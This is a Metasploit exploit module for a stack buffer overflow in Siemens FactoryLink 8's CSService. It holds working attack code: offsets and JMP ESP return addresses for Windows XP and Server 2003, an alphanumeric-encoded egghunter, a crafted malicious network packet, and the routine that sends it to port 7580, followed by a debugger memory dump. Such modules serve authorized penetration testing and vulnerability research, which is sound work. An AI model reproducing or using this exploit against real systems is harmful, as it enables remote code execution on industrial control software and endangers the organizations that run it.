1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Egghunter
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
17
        'Description' => %q{
18
          This module exploits a vulnerability found on Siemens FactoryLink 8. The
19
          vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,
20
          the user-supplied path first gets converted to ANSI format (CodePage 0), and then
21
          gets handled by a logging routine where proper bounds checking is not done,
22
          therefore causing a stack-based buffer overflow, and results arbitrary code execution.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'Luigi Auriemma <aluigi[at]autistici.org>', # Initial discovery, poc
27
          'sinn3r', # Metasploit (thx hal)
28
        ],
29
        'References' => [
30
          ['OSVDB', '72812'],
31
          ['URL', 'http://aluigi.altervista.org/adv/factorylink_1-adv.txt'],
32
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']
33
        ],
34
        'Payload' => {
35
          'BadChars' => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
36
          'StackAdjustment' => -3500,
37
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
38
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },
39
        },
40
        'DefaultOptions' => {
41
          'EXITFUNC' => "process",
42
        },
43
        'Platform' => 'win',
44
        'Targets' => [
45
          [
46
            'Windows XP SP3',
47
            {
48
              'Offset' => 965, # Offset to overwrite RETN
49
              'Ret' => 0x7e4456f7,  # JMP ESP in USER32.dll
50
              'Max' => 1400,        # Max buffer used
51
            }
52
          ],
53
          [
54
            'Windows Server 2003 SP0',
55
            {
56
              'Offset' => 965,
57
              'Ret' => 0x77d20738, # JMP ESP in USER32.dll
58
              'Max' => 1400,
59
            }
60
          ]
61
        ],
62
        'Privileged' => false,
63
        'DisclosureDate' => '2011-03-25',
64
        'Notes' => {
65
          'Reliability' => UNKNOWN_RELIABILITY,
66
          'Stability' => UNKNOWN_STABILITY,
67
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
68
        }
69
      )
70
    )
71

72
    register_options(
73
      [
74
        Opt::RPORT(7580)
75
      ]
76
    )
77
  end
78

79
  # User input will get converted back to ANSCI with WideCharToMultiByte before vsprintf
80
  def to_unicode(text)
81
    output = ''
82
    (text.length).times do |i|
83
      output << text[i, 1] << "\x00"
84
    end
85
    return output
86
  end
87

88
  def exploit
89
    # Modify payload
90
    # XP = Align EAX 0x3a bytes.  Win2k3SP0 = 0x0a bytes
91
    p = "\x57" # PUSH EDI
92
    p << "\x59"      # POP ECX
93
    p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a")
94
    p << "\x30\xc1"  # XOR CL,AL
95
    p << payload.encoded
96

97
    # Meterpreter tends to fail because of it being mangled.  We use an egghunter
98
    # instead to ensure the payload's integrity.
99
    egg_options =
100
      {
101
        :checksum => true,
102
        :eggtag => "W00T",
103
      }
104

105
    egghunter, p = generate_egghunter(p, payload_badchars, egg_options)
106

107
    # x86/alpha_mixed egghunter
108
    alpha_encoder = framework.encoders.create("x86/alpha_mixed")
109
    alpha_encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
110
    egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)
111

112
    sploit = ''
113
    sploit << make_nops(4)
114
    sploit << p
115
    sploit << rand_text_alpha(965 - sploit.length)
116
    sploit << [target.ret].pack('V*')
117
    sploit << egghunter
118

119
    sploit << rand_text_alpha(target['Max'] - sploit.length)
120
    sploit = to_unicode(sploit)
121

122
    pkt = "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00"
123
    pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00"
124
    pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03"
125
    pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44"
126
    pkt << sploit
127
    pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00"
128
    pkt << "\x00\x01\x99\x99\x99"
129

130
    print_status("Sending malicious request to remote host...")
131

132
    connect
133
    sock.put(pkt)
134
    handler
135
    select(nil, nil, nil, 6)
136
    disconnect
137
  end
138
end
139

140
=begin
141
0:000> g
142
call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc
143
eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002
144
eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0         nv up ei pl nz na po nc
145
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
146
CSService+0xb908:
147
0040b908 ff15249b4400    call    dword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}
148

149
0:000> dc 0012ead0
150
0012ead0  65535343 63697672 43203a65 47534d53  CSService: CSMSG
151
0012eae0  73694c5f 6c694674 525f7365 2d205145  _ListFiles_REQ -
152
0012eaf0  6f685320 72694477 2c303d73 6c694620   ShowDirs=0, Fil
153
0012eb00  3d726574 6150202c 613d6874 61616161  ter=, Path=aaaaa
154
0012eb10  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
155
0012eb20  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
156
0012eb30  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
157
0012eb40  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
158

159
=end
160

161